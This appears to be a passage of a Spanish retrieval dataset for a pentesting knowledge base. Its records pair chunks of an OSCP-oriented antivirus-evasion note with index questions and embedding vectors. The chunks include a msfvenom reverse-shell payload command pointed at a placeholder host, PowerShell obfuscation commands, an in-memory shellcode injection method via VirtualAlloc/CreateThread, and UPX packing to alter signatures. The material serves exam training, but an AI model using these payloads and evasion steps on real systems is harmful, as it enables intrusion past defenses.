-0.10691, 0.10648, 0.07065, -0.01765, -0.05259, -0.09469, 0.07338, 0.05064, 0.01309, 0.01796, 0.11678, 0.01789, 0.05054, -0.02083, -0.07032, -0.02434, 0.00779, 0.04576, 0.02851, 0.06567, -0.0431, -0.03331, 0.01276, 0.02571, -0.06083, 0.01781, -0.03278, -0.00501, -0.02466, 0.06287, -0.02642, -0.04619, -0.02582, -0.07024, -0.07949, 0.02648, 0.02217, 0.12308, 0.05615, -0.03295, -0.0043, -0.09012, -0.05073, -0.07393, -0.04033, -0.00905, 0.02711, 8e-05, 0.02502, -0.00297, -0.00555, -0.02482, -0.05057, -0.02019, 0.01369, -0.00265, 0.01461, -0.04239, -0.10903, -0.08705, -0.06656, -0.0097, -0.00724, -0.0335, -0.00984, -0.0813, -0.07167, 0.0538, -0.04631, -0.00227, 0.0057, -0.01374, 0.04997, -0.00583, -0.08705, 0.06663, 0.03019, 0.01168, 0.03473, 0.03652, -0.05423, -0.01008, 0.08012, -0.03869, -0.00052, -0.0367, 0.0622, -0.0153, -0.01584, -0.04733, -0.01529, 0.06168, 0.04193, 0.03452, 0.01025, 0.01208, -0.05579, -0.00039, -0.08511, 0.03141, -0.00128, -0.06807, -0.04513, 0.06343, -0.02361, -0.03975, 0.05521, 0.05094, -0.04085, -0.04809, -0.01838, -0.02335, -0.09607, 0.00053, -0.00098, -0.02894, -0.00825, 0.05474, 0.07944, 0.0069, -0.0198, -0.00044]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Generar y ofuscar\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ msfvenom\npython3 ps_encoder.py -s evasion.ps1 # darkoperator/Invoke-Obfuscation\n./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1 # Chimera: ofusca strings/variables\n```", "indexar": "que programa hay para generar y ofuscar scripts de PowerShell?", "v": [-0.00089, -0.13512, 0.0118, -0.14461, -0.01307, -0.17035, -0.03319, -0.05067, 0.10629, -0.03841, -0.10779, 0.08153, -0.04975, -0.1339, -0.04399, 0.07417, -0.04211, -0.14119, 0.0019, 0.1235, 0.00903, 0.07723, -0.06049, -0.09971, -0.08943, 0.03616, -0.02546, 0.02252, -0.15566, 0.00111, 0.02564, 0.05079, 0.01803, -0.16716, -0.07568, 0.01668, -0.03303, 0.09252, 0.10726, 0.2163, -0.05744, 0.04292, -0.02032, 0.03182, 0.00211, -0.06934, 0.06892, -0.05942, 0.01247, -0.10531, 0.02869, -0.02556, -0.04853, 0.00759, 0.06913, -0.0266, -0.07778, -0.21498, -0.17141, 0.05497, -0.00459, 0.05416, 0.01086, -0.01263, -0.01703, 0.01212, 0.04577, -0.13855, -0.10209, 0.08219, -0.06088, 0.01186, 0.01068, -0.02311, 0.09692, 0.0266, -0.07831, -0.05244, -0.04422, -0.02514, -0.07306, -0.04008, 0.02856, 0.1224, -0.04524, -0.02087, -0.05766, -0.07539, -0.10405, -0.03475, 0.09392, 0.07896, 0.02325, 0.13067, 0.05734, -0.06021, 0.10843, 0.05337, 0.06793, 0.02555, -0.07534, -0.14389, -0.06658, 0.08745, 0.01047, 0.09321, 0.10269, 0.02757, 0.00062, 0.06138, 0.00942, 0.04758, 0.06345, 0.03217, -0.04632, 0.01911, -0.01315, -0.03184, 0.04982, -0.07872, -0.07553, 0.0696, -0.07098, 0.00247, 0.04459, 0.01029, 0.00156, 0.01689, -0.00811, 0.05798, -0.03578, -0.04522, -0.03257, -0.06472, -0.0951, -0.0054, 0.03029, 0.04221, -0.04316, -0.08305, 0.04031, 0.10681, 0.07724, 0.05078, 0.00703, -0.10903, -0.07704, -0.04681, 0.02622, 0.03507, 0.02066, 0.06073, 0.00397, 0.05227, -0.05, -0.0806, 0.03648, 0.01941, -0.07495, -0.01412, -0.0693, -0.04735, -0.0425, 0.00926, 0.0525, -0.04698, -0.10011, 0.02642, 0.04878, 0.06681, 0.02866, 0.06554, 0.09402, -0.06823, -9e-05, -0.03015, 0.01979, -0.09568, -0.11794, -0.04452, -0.06182, -0.0053, 0.02386, 0.02246, -0.03892, 0.02958, -0.03259, 0.01871, 0.00725, 0.00828, -0.03438, -0.01142, -0.00787, -0.08827, 0.02738, -0.0072, -0.00471, 0.00121, 0.01265, -0.03323, -0.07347, 0.03856, -0.01455, 0.00306, 0.06954, 0.05527, -0.00579, -0.02231, -0.0009, -0.00705, 0.06866, 0.01022, 0.0535, 0.04774, -0.04618, -0.03969, 0.02006, 0.04728, 0.04397, 0.0432, 0.00998, -0.03308, -0.00016, 0.02046, 0.01423, -0.03412, 0.05564, 0.01511, 0.00194, 0.04485, -0.00155, -0.04944, -0.03987, -0.02021, 0.02572, -0.0223, -0.0222, 0.01167, -0.01292, -0.05707, -0.05126, 0.03804, 0.03231, -0.06574, -0.05876, 0.00579, -0.03983, -0.02136, 0.04536, 0.04923, -0.01007, -0.01505, 0.0056, -0.03438, 0.05065, -0.00277]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Generar y ofuscar\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ msfvenom\npython3 ps_encoder.py -s evasion.ps1 # darkoperator/Invoke-Obfuscation\n./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1 # Chimera: ofusca strings/variables\n```", "indexar": "con que puedo crear un inversor para obfuscar comandos en Windows?", "v": [0.11883, 0.00267, -0.07583, -0.0843, -0.00658, -0.07008, 0.01948, -0.02049, -0.08579, -0.15932, -0.05725, -0.1005, 0.04542, -0.11258, -0.13734, 0.11078, 0.0488, -0.07806, -0.06491, 0.051, 0.1113, -0.04569, 0.02878, -0.07574, 0.01694, 0.00732, -0.06055, -0.01653, -0.13551, -0.08613, -0.06122, 0.02574, 0.05839, -0.00221, -0.0577, -0.04906, -0.10346, 0.0145, 0.0423, 0.19228, -0.00324, 0.20618, -0.11526, 0.09768, 0.10769, -0.08893, 0.09817, -0.03549, 0.17847, -0.02898, -0.01507, -0.11981, -0.11635, -0.01815, -0.01551, -0.04264, 0.12732, -0.09521, 0.00775, 0.0265, -0.03403, 0.07998, -0.09097, 0.09516, 0.01476, -0.00706, -0.00779, -0.03605, 0.08529, 0.11522, -0.10681, 0.02188, -0.02187, 0.01853, 0.13805, 0.05802, -0.01015, -0.05833, 0.0755, -0.04112, -0.0416, 0.0618, -0.02201, 0.00748, 0.06931, -0.1222, -0.08335, -0.02838, 0.00957, -0.12089, 0.01722, -0.09167, -0.01289, 0.00168, 0.02369, 0.02568, 0.02559, -0.01414, 0.00426, 0.08512, -0.05188, -0.03677, -0.12441, 0.17274, 0.02971, 0.05979, 0.06753, -0.07608, -0.03168, -0.02727, 0.0431, 0.02488, 0.01716, -0.02114, -0.00554, -0.0097, -0.04313, -0.03518, 0.01169, 0.09453, -0.09679, -0.03751, -0.03198, 0.09367, -0.03918, -0.06878, -0.057, 0.00708, -0.08029, 0.08223, -0.01222, -0.03923, 0.02296, -0.10043, -0.1016, 0.12843, 0.03038, 0.01342, -0.07938, -0.07982, 0.14419, 0.08539, 0.07072, 0.00645, -0.02436, -0.00195, 0.03569, -0.00936, -0.04385, -0.07006, 0.05385, 0.03486, 0.0012, 0.01195, -0.03402, -0.0423, 0.04953, 0.03752, 0.04401, 0.07688, -0.04506, 0.04858, -0.06209, -0.08081, 0.00386, -0.06127, -0.09991, 0.00782, -0.03938, -0.01879, -0.0712, 0.04302, 0.04278, -0.04282, 0.05859, 0.01685, 0.0338, -0.03924, -0.04535, -0.05081, -0.01573, 0.00043, -0.05974, -0.01936, 0.00944, -0.00648, -0.02682, 0.06604, -0.081, 0.01449, -0.09003, 0.07104, 0.01903, -0.04955, -0.02194, -0.02448, 0.02109, -0.01938, -0.0163, 0.00569, -0.04637, 0.03613, -0.02761, -0.05171, 0.05387, 0.01059, -0.0682, 0.08454, 0.06748, 0.02768, 0.03271, 0.00481, 0.04041, 0.01672, 0.00027, -0.05636, 0.03321, 0.01418, -0.00277, -0.01824, 0.03834, 0.02088, 0.00554, -0.01457, 0.01138, -0.02522, -0.09182, -0.0471, 0.01967, -0.00094, 0.00482, 0.0342, -0.01298, -0.04244, 0.02711, 0.04516, -0.01338, -0.00646, -0.01438, 0.00812, -0.03818, 0.04873, -0.024, -0.07181, -0.03282, -0.02938, -0.06086, -0.00494, -0.02167, -0.02528, -0.00505, 0.00655, 0.04816, -0.04372, -0.01139, 0.01072]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Generar y ofuscar\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ msfvenom\npython3 ps_encoder.py -s evasion.ps1 # darkoperator/Invoke-Obfuscation\n./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1 # Chimera: ofusca strings/variables\n```", "indexar": "cual es una alternativa libre a los generadores de shells reversas?", "v": [0.19169, -0.07313, 0.02239, 0.12213, -0.06674, 0.07479, -0.09153, -0.03941, -0.07264, -0.05429, -0.13985, -0.07962, -0.08388, 0.02267, 0.19365, -0.02378, -0.0623, -0.06413, 0.04937, 0.05463, -0.12769, -0.05354, -0.06612, -0.15457, -0.04051, -0.0262, -0.03244, -0.01837, -0.11471, 0.06456, -0.0149, -0.06986, 0.01541, -0.1226, -0.0905, 0.08897, 0.00643, 0.06013, 0.11084, -0.01361, 0.02082, -0.04503, -0.08524, 0.1222, -0.00967, -0.11589, -0.07505, -0.01544, -0.00073, 0.06378, -0.08374, 0.03396, -0.12928, 0.09548, 0.08535, -0.05232, 0.16082, -0.15663, -0.054, -0.0632, -0.09522, 0.11972, 0.05149, -0.03971, -0.00228, -0.08185, -0.17305, -0.06626, -0.01382, -0.00233, 0.04003, 0.00941, 0.05238, -0.00334, -0.09756, 0.08196, -0.02476, 0.02088, -0.03417, 0.09727, -0.03834, -0.14484, 0.01695, 0.02805, 0.05993, -0.03718, 0.02625, -0.08, -0.00793, -0.02425, 0.00388, 0.03906, -0.01468, 0.18161, -0.03811, -0.10066, -0.04543, 0.13227, -0.07486, 0.08869, 0.00981, 0.00465, -0.03649, 0.07086, 0.04374, 0.03156, -0.06307, 0.03082, 0.00052, 0.0845, 0.01867, 0.01784, 0.07087, 0.07188, 0.0285, -0.00729, -0.04635, 0.03499, 0.03449, -0.0003, 0.04311, -0.04169, 0.00275, -0.06793, 0.01987, 0.08295, -0.02765, 0.0275, -0.0073, 0.03496, 0.05358, -0.02929, -0.03964, -0.03605, -0.07302, -0.01791, 0.07912, -0.02947, 0.05114, -0.04833, -0.01013, 0.10851, 0.03206, -0.02924, 0.01447, -0.08059, 0.00602, -0.06152, -0.06754, -0.04866, -0.06354, 0.04304, 0.00508, 0.11634, -0.0837, -0.00366, -0.06217, -0.03259, -0.00447, 0.07544, 0.00986, -0.035, 0.04068, 0.01789, -0.04446, -0.01409, -0.09446, -0.04278, -0.06735, -0.00575, -0.03964, 0.01479, 0.06201, -0.04805, 0.0489, -0.04094, -0.03587, -0.06729, 0.00066, -0.04818, 0.02371, 0.03874, -0.10231, -0.06698, -0.07014, -0.04205, 0.02197, 0.05095, 0.05298, 0.06627, 0.02398, 0.01746, -0.04876, -0.06178, -0.01707, 0.05295, 0.06256, -0.06156, 0.0442, 0.00872, -0.03787, -5e-05, 0.02744, -0.06355, -0.00332, 0.04099, -0.08096, 0.01242, -0.01533, 0.00044, 0.06948, 0.03949, 0.04694, 0.07577, -0.06463, 0.00597, 0.00536, -0.03679, -0.02305, 0.05761, 0.0539, 0.01816, 0.01693, 0.01974, -0.01125, -0.00258, 0.04846, 0.07441, -0.02612, 0.02615, -0.00959, 0.05098, 0.01592, 0.0165, -0.0272, 0.02507, 0.00653, 0.01196, 0.04466, -0.00039, 0.05885, 0.08242, 0.00016, -0.0362, 0.0044, 0.03203, -0.08784, -0.05348, -0.02715, 0.00398, -0.04472, 0.04856, -0.00196, -0.01796, 0.09515, -0.04618]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## InyecciΓ³n directa (P/Invoke)\nScript PS que reserva memoria con **VirtualAlloc**, copia el shellcode y lanza **CreateThread** β†’ ejecuta sin escribir un .exe al disco (evade el escaneo on-write).", "indexar": "que programa puedo usar para reservar memoria en Windows sin crear un archivo ejecutable?", "v": [0.08541, 0.05156, -0.09924, -0.16219, 0.03955, -0.04887, 0.0049, -0.01336, -0.1175, -0.17729, -0.12497, -0.08886, 0.05913, -0.0479, -0.05135, 0.01509, 0.1031, 0.00417, 0.04384, -0.00414, 0.00752, -0.01399, 0.00418, 0.05437, -0.10204, -0.01807, 0.01699, 0.08065, -0.10982, 0.00437, 0.01737, 0.07748, 0.09938, -0.12799, 0.06335, 0.08659, 0.03369, 0.01854, -0.05819, 0.09834, 0.06222, 0.12329, -0.13665, 0.15752, 0.00667, -0.00913, 0.1219, 0.00382, 0.02798, -0.00458, 0.03847, -0.00882, -0.06709, -0.04344, 0.15634, -0.11115, 0.01888, -0.17602, -0.01462, 0.04848, -0.03509, 0.06846, 0.02603, 0.02368, 0.08076, -0.00259, 0.04818, 0.0078, -0.03517, 0.13948, -0.1687, 0.06145, 0.08269, 0.01864, 0.04798, 0.0241, -0.05045, -0.10281, 0.02998, -0.00819, -0.07382, -0.03814, 0.00831, -0.06673, -0.06643, -0.03908, -0.01208, -0.00602, 0.02733, -0.09315, 0.07717, 0.01165, -0.04881, 0.16333, 0.13325, -0.09461, 0.08753, 0.08745, 0.04695, 0.08512, 0.0404, -0.07743, -0.02301, 0.1668, 0.03242, 0.07791, 0.00387, -0.01819, -0.04642, -0.05371, 0.03314, -0.01097, -0.05333, 0.0087, -0.11016, 0.01019, 0.03253, -0.05173, 0.07343, 0.01576, -0.05574, -0.01299, -0.09216, 0.00133, 0.02198, -0.04351, -0.07359, 0.10008, -0.15455, 0.06494, -0.01113, 0.06128, -0.0572, -0.12207, -0.046, 0.02817, 0.0161, 0.05319, 0.06236, -0.09941, 0.10791, 0.05459, -0.01351, 0.01722, -0.00656, 0.06285, 0.01242, -0.01087, -0.02326, 0.01345, 0.09475, -0.04759, -0.01277, -0.0023, -0.07679, 0.02266, 0.04329, -0.01728, -0.05165, 0.02034, -0.04543, 0.06307, -0.03171, -0.02331, 0.04254, -0.10229, -0.07039, 0.04231, 0.07884, 0.00453, -0.0001, 0.01756, -0.01989, -0.09504, 0.03991, -0.05115, -0.05294, -0.03851, 0.02371, 0.00289, -0.1027, -0.00239, 1e-05, 0.02721, -0.0344, -0.06272, 0.02853, 0.05297, -0.05226, 0.03182, -0.05792, 0.02237, 0.0588, -0.00121, 0.00642, -0.07611, -0.04076, 0.02088, 0.03419, 0.00518, -0.05377, 0.0135, -0.0497, -0.00991, 0.07815, 0.04819, -0.0923, 0.04238, 0.03707, 0.05397, -0.00133, -0.02899, 0.02773, -0.05376, -0.03328, -0.03683, 0.01321, 0.00413, 0.04938, -0.01074, 0.00357, 0.02955, 0.08176, 0.0426, 0.00346, -0.04089, -0.01817, 0.02308, -0.03265, -0.034, -0.02504, 0.05553, -0.00268, -0.01428, 0.07279, -0.00656, 0.00273, -0.02966, -0.01527, -0.03571, -0.0193, 0.07725, -0.0785, -0.03248, -0.05273, -0.02332, -0.02634, 0.06045, 0.01655, -0.07243, -0.00869, 0.01806, 0.04715, -0.03841, -0.0087, 0.02587]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## InyecciΓ³n directa (P/Invoke)\nScript PS que reserva memoria con **VirtualAlloc**, copia el shellcode y lanza **CreateThread** β†’ ejecuta sin escribir un .exe al disco (evade el escaneo on-write).", "indexar": "con que herramienta puedo ejecutar cΓ³digo directamente en el sistema operativo sin generar un archivo?", "v": [0.02845, 0.01891, -0.09561, -0.19168, -0.01224, -0.18878, 0.03479, 0.02162, -0.07606, -0.10456, -0.14718, -0.12069, 0.04075, -0.06553, 0.12096, -0.0117, 0.18015, -0.13796, -0.01026, -0.06004, -0.07828, 0.00539, 0.0178, -0.0612, -0.04498, 0.04162, -0.02497, 0.03202, -0.22031, -0.04197, -0.02223, 0.04162, 0.16269, -0.0697, -0.09075, 0.09017, 0.02508, 0.09681, -0.05806, 0.09646, -0.03335, 0.10269, -0.12849, 0.13328, 0.03473, -0.02912, 0.10979, 0.04344, 0.02832, -0.04831, -0.03928, -0.1519, -0.17947, -0.07754, 0.01092, -0.16066, 0.1081, -0.16546, 0.01193, -0.03941, -0.01454, -0.01189, 0.00132, -0.07584, 0.00624, 0.02381, 0.06954, -0.00876, -0.05235, 0.13094, -0.04921, 0.12561, 0.03999, 0.0815, 0.03581, 0.01976, -0.00827, -0.03501, -0.02593, 0.07393, 0.02949, -0.01442, -0.04451, 0.00104, -0.02763, -0.11303, 0.00085, -0.02753, -0.00658, -0.09373, 0.06149, -0.02236, -0.00318, 0.08265, 0.08372, -0.01072, 0.02488, -0.0096, 0.00018, -0.00318, 0.05483, -0.13236, -0.05889, 0.08236, 0.12391, 0.00972, 0.03909, 0.07608, -0.00161, -0.00761, -0.0096, -0.06189, 0.02765, 0.01628, -0.07752, 0.03021, -0.0207, -0.03869, -0.01271, -0.05813, -0.07154, 0.09856, -0.08955, 0.00794, 0.00629, -0.02824, -0.01349, 0.11513, -0.03426, -0.06343, -0.01809, -0.02612, -0.02583, 0.00468, -0.03151, -0.00973, 0.04404, -0.03565, 0.05263, -0.03306, 0.04678, 0.02115, 0.05607, 0.0277, 0.04979, 0.0259, 0.02376, -0.12599, -0.03995, -0.09143, 0.0576, -0.03759, -0.083, -0.03098, -0.08413, 0.03497, -0.01319, -0.01958, -0.05497, -0.03471, -0.03123, -0.00473, -0.0373, -0.004, -0.02739, -0.03252, -0.01159, 0.00441, 0.03438, 0.00539, 0.02522, 0.02784, 0.12114, -0.07782, 0.02351, -0.02544, -0.04537, -0.05172, 0.0193, -0.02303, -0.0697, 0.04626, 0.03703, -0.02946, -0.01353, -0.02035, 0.02744, 0.05813, -0.01832, 0.05296, 0.00659, 0.07956, 0.04076, -0.0138, 0.01989, 0.02253, 0.00441, 0.00338, -0.01976, -0.02682, -0.04472, 0.0096, 0.03096, -0.06648, 0.0211, 0.06468, -0.00197, 0.00839, -0.02173, 0.02698, 0.00927, 0.0088, 0.06909, -0.03975, -0.04645, 0.01387, -0.02358, 0.06693, 0.04147, -0.05022, 0.00607, 0.00228, 0.10718, 0.01125, 0.01353, -0.02662, -0.02173, 0.05202, -0.04686, -0.0608, 0.00697, -0.0219, -0.00861, 0.03296, 0.06318, -0.03562, 0.01089, 0.00113, -0.05229, -0.05443, 0.03575, 0.06913, 0.0238, -0.05785, -0.03111, -0.00821, -0.02099, -0.04417, -0.03591, -0.09191, -0.02628, -0.00736, 0.04803, -0.04209, 0.01013, -0.02175]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## InyecciΓ³n directa (P/Invoke)\nScript PS que reserva memoria con **VirtualAlloc**, copia el shellcode y lanza **CreateThread** β†’ ejecuta sin escribir un .exe al disco (evade el escaneo on-write).", "indexar": "cual es una alternativa a los scripts PS para manejar VirtualAlloc y CreateThread sin escribir un .exe?", "v": [-0.08734, -0.00998, -0.13467, -0.10742, 0.00904, -0.18845, -0.07816, -0.15004, 0.14824, -0.05293, -0.01798, -0.11955, 0.07081, -0.07844, 0.01205, 0.01041, 0.08363, -0.06707, 0.13535, 0.07039, 0.00288, -0.03473, -0.03183, -0.01797, 0.03429, 0.07004, -0.11706, 0.0312, -0.13262, -0.03005, -0.03191, 0.17361, 0.02975, -0.11795, 0.0227, -0.0039, 0.06902, 0.04477, 0.06545, 0.16339, 0.01811, 0.14918, -0.06873, 0.15907, -0.04986, -0.04158, 0.16449, 0.04151, 0.0237, 0.05602, -0.02611, 0.01015, -0.17546, 0.08142, 0.10501, 0.05877, 0.13185, -0.24105, -0.0992, -0.05909, -0.10298, 0.01634, -0.00315, -0.0577, 0.05129, 0.02502, 0.02884, -0.08818, -0.14912, 0.11679, -0.06625, 0.03098, -0.05994, -0.01571, -0.00151, -0.05096, -0.09299, -0.03158, 0.0279, 0.07244, -0.02866, -0.06366, -0.03228, -0.01458, 0.00646, -0.05666, -0.0749, -0.08028, -0.05806, -0.01482, 0.13661, -0.05365, -0.00984, -0.03229, 0.05024, -0.07889, 0.12746, -0.04261, 0.03763, 0.01666, -0.03185, -0.03001, -0.03219, 0.12762, -0.04108, -0.02324, -0.02814, 0.08545, -0.02118, 0.03389, 0.03269, 0.07928, 0.00807, 0.06478, 0.04281, -0.03628, -0.00567, 0.04935, 0.05594, -0.05923, -0.04712, 0.01743, -0.04983, -0.05614, -0.03469, -0.0175, 0.0311, 0.02174, -0.06697, 0.06104, -0.05549, -0.05196, -0.04312, -0.08996, -0.05767, 0.04397, 0.07784, 0.05778, 0.00922, -0.05174, 0.04052, 0.05331, 0.02368, -0.00421, -0.02986, -0.0357, -0.06829, -0.05135, 0.0248, -0.02441, 0.04077, 0.00685, -0.00216, 0.05102, -0.05031, -0.05677, -0.0751, 0.05522, -0.09012, 0.05055, 0.00787, 0.01458, -0.01574, -0.00161, -0.00504, -0.01849, -0.03724, -0.00511, -0.01273, 0.04977, -0.04302, 0.04093, 0.08314, -0.07849, 0.03755, -0.08761, -0.02042, -0.08675, -0.02636, -0.00706, 0.00931, -0.05274, 0.00481, 0.06478, -0.0167, -0.01059, 0.05247, -0.00747, -0.05525, 0.00345, -0.02524, 0.01357, -0.04668, -0.09432, -0.01175, -0.00435, -0.01416, -0.09215, 0.04706, -0.0502, -0.0299, 0.01813, -0.06014, -0.00782, 0.03481, 0.00996, -0.05079, 0.02881, -0.02994, 0.00408, 0.05975, 0.01513, -0.03257, 0.06288, 0.04549, 0.03005, 0.00511, 0.01374, -0.00753, -0.04374, 0.02568, -0.01961, 0.00804, -0.05707, -0.03936, -0.03065, 0.00308, 0.03564, -0.02594, 0.01563, -0.02277, -0.03718, 0.03277, 0.05616, 0.01577, 0.01701, -0.01148, -0.03157, 0.00739, -0.00451, 0.0067, 0.0049, -0.00735, -0.08668, -0.03247, 0.00754, -0.03044, 0.00855, -0.07199, -0.00546, -0.00319, -0.03364, 0.02233, 0.02533, 0.00239, 0.02892]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Otras tools\n- **Shellter** (inyecta en un .exe legΓ­timo), **Veil**, **Nim/C# loaders**.\n- **UPX** para empaquetar y cambiar la firma: `upx -9 rev.exe`.\n\n> Nota OSCP: la evasiΓ³n de AV estΓ‘ permitida (no es un escΓ‘ner de vulns prohibido β†’ Reglas de herramientas); rara vez hace falta en el examen, pero alguna mΓ‘quina la pide.\n\nRelacionado: Client-side attacks Β· msfvenom Β· Reverse shell Β· OSCP MOC", "indexar": "quΓ© programa inyecta cΓ³digo en un .exe legΓ­timo para evadir antivirus?", "v": [-0.11716, -0.08115, -0.11396, -0.03311, 0.10174, -0.068, 0.06672, -0.01348, -0.12889, -0.0772, -0.01433, -0.19351, -0.05767, -0.02904, 0.06783, -0.03502, 0.15601, -0.10199, 0.08316, 0.02924, -0.0339, -0.01392, -0.07163, -0.02803, 0.00784, 0.13791, -0.15969, 0.15694, 0.02033, -0.00102, -0.01218, 0.07967, 0.0688, -0.0535, -0.0438, 0.14288, 0.07889, 0.00809, 0.03388, 0.09715, 0.1537, -0.00107, -0.07472, -0.03442, -0.02271, -0.08453, 0.09403, 0.03003, 0.11933, -0.04165, -0.0983, -0.0153, -0.02275, -0.03067, 0.10732, -0.10026, -0.05376, -0.18197, -0.01183, 0.04508, -0.0474, -0.0101, 0.03129, -0.01169, -0.02256, -0.01602, 0.12472, -0.07478, -0.08124, -0.01566, -0.05027, 0.08171, -0.01934, -0.05971, 0.00205, -0.10116, -0.12321, -0.10745, 0.04863, 0.06917, 0.00228, 0.02841, 0.0251, -0.0563, -0.07924, -0.047, -0.02179, -0.03595, -0.04437, -0.08091, 0.0836, 0.03099, -0.01102, 0.1379, 0.06836, -0.08218, 0.0821, 0.07986, 0.06673, 0.05108, -0.00242, -0.07193, -0.06165, 0.1414, 0.01079, -0.01442, -0.01499, 0.00161, -0.07293, 0.05726, -0.01935, -0.05063, -0.10884, -0.00346, -0.05739, -0.0842, -0.02111, -0.01058, 0.02694, -0.07573, -0.12577, 0.04865, -0.11118, 0.06863, 0.06629, -0.02217, 0.00266, 0.16432, -0.07015, -0.03474, -0.01161, -0.09576, 0.00546, -0.02717, -0.08139, 0.01428, 0.05474, -0.01309, -0.01197, 0.00997, 0.0307, 0.03313, 0.05454, 0.16182, -0.0104, 0.01416, -0.00531, -0.06056, 0.00265, 0.0195, 0.10158, 0.02525, -0.07363, 0.07368, -0.05473, 0.04082, -0.06266, 0.00506, -0.01227, -0.02089, -0.06872, 0.02231, 0.01709, -0.03381, 0.00571, -0.00485, 0.027, -0.01608, 0.02594, 0.09207, 0.00592, 0.06096, 0.07081, -0.10492, -0.00273, -0.0109, 0.02793, -0.09919, 0.0046, -0.03714, -0.01937, 0.01362, 0.1258, -0.002, 0.00916, -0.0108, 0.00594, 0.07479, -0.0062, 0.02133, -0.00968, 0.00667, -0.05114, 0.00147, 0.00705, -0.03462, -0.01534, -0.04788, 0.05547, 0.01183, -0.07473, 0.02455, 0.02069, -0.03949, 0.06524, 0.09419, -0.02865, -0.02289, 0.01884, 0.06689, 0.01796, 0.00816, 0.01675, 0.04792, -0.03471, -0.01863, 0.0164, 0.0493, 0.05324, -0.002, -0.00489, -0.01542, 0.03616, -0.04764, -0.02453, -0.07523, 0.02026, 0.02136, 0.02057, 0.00065, -0.02677, -0.03435, 0.00477, -0.0373, 0.00713, 0.04126, -0.00389, -0.02179, 0.00889, -0.02959, -0.02702, 0.04693, 0.01516, -0.11181, -0.0322, 0.02741, -0.03702, -0.012, 0.0258, 0.00506, -0.08293, -0.01158, -0.0267, -0.01384, 0.03293, 0.02878]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Otras tools\n- **Shellter** (inyecta en un .exe legΓ­timo), **Veil**, **Nim/C# loaders**.\n- **UPX** para empaquetar y cambiar la firma: `upx -9 rev.exe`.\n\n> Nota OSCP: la evasiΓ³n de AV estΓ‘ permitida (no es un escΓ‘ner de vulns prohibido β†’ Reglas de herramientas); rara vez hace falta en el examen, pero alguna mΓ‘quina la pide.\n\nRelacionado: Client-side attacks Β· msfvenom Β· Reverse shell Β· OSCP MOC", "indexar": "con quΓ© puedo empaquetar y cambiar la firma de un archivo ejecutable?", "v": [0.04648, 0.11637, -0.03509, 0.04281, 0.11314, -0.02629, 0.07761, 0.05959, -0.16723, -0.1486, -0.19711, -0.0465, 0.07395, 0.00987, 0.00299, 0.05673, 0.0597, -0.07028, 0.0715, -0.03305, 0.09264, 0.03457, 0.00185, -0.07325, -0.10222, -0.01859, -0.05415, 0.12765, -0.20795, 0.02631, -0.04461, 0.10443, 0.13363, -0.04437, 0.09359, 0.11354, 0.09381, -0.03233, 0.04321, 0.10855, 0.057, 0.00127, -0.13466, 0.04878, -0.07241, 0.0022, 0.03997, 0.01581, 0.04306, 0.03658, -0.0512, -0.05983, -0.14445, -0.07657, 0.03336, 0.02784, 0.08306, -0.15934, 0.08937, 0.03439, -0.05403, -0.0034, -0.04903, 0.02157, 0.04458, -0.01423, -0.05522, -0.02434, -0.02621, 0.03541, -0.11494, 0.01086, -0.00398, 0.05175, -0.06241, -0.06375, -0.01391, -0.14878, -0.07145, 0.13256, -0.01545, -0.02497, -0.14761, 0.011, 0.03476, -0.04106, -0.1296, -0.06929, 0.02809, -0.06476, 0.1155, -0.01316, 0.06987, 0.05212, -0.03142, -0.01414, 0.02552, -0.01908, -0.01197, -0.0304, 0.05208, 0.06795, -0.08158, 0.08064, 0.00565, 0.07462, -0.08761, 0.0355, -0.02229, -0.05961, 0.01918, -0.00014, 0.05339, 0.01352, -0.06181, -0.06801, -0.03271, -0.07008, -0.01725, 0.00147, -0.07973, -0.0176, -0.0288, 0.02892, -0.02397, -0.07081, 0.02757, 0.11222, -0.06128, 0.03722, -0.04444, 0.00383, -0.05411, -0.10437, -0.02924, -0.00149, 0.01974, 0.02092, 0.005, -0.10983, 0.10566, 0.01942, 0.00158, 0.09393, 0.09768, 0.00517, -0.00807, -0.0835, -0.08554, 0.02254, 0.04978, -0.04129, -0.00107, 0.03089, -0.09787, 0.03512, 0.05051, -0.04787, -0.00143, 0.06774, -0.0241, 0.01593, -0.04413, 0.00508, -0.00528, -0.02589, -0.064, 0.02333, 0.04599, -0.03653, 0.00354, 0.00355, -0.0321, -0.04424, 0.03273, -0.04419, -0.09796, -0.06169, 0.07715, 0.02041, 0.0069, 0.06664, 0.04976, 0.0985, 0.04214, -0.01648, 0.06141, 